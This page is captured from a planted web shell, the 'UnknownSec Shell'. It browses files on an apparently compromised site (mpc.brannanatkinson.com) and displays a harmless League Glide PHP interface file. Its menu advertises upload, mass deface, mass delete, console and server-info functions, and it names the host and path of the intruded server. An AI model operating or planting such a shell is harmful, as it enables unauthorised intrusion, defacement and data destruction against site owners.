shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
league
/
glide
/
src
/
Responses
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
ResponseFactoryInterface.php
<?php namespace League\Glide\Responses; use League\Flysystem\FilesystemOperator; interface ResponseFactoryInterface { /** * Create response. * * @param FilesystemOperator $cache Cache file system. * @param string $path Cached file path. * * @return mixed The response object. */ public function create(FilesystemOperator $cache, $path); }
© 2026 UnknownSec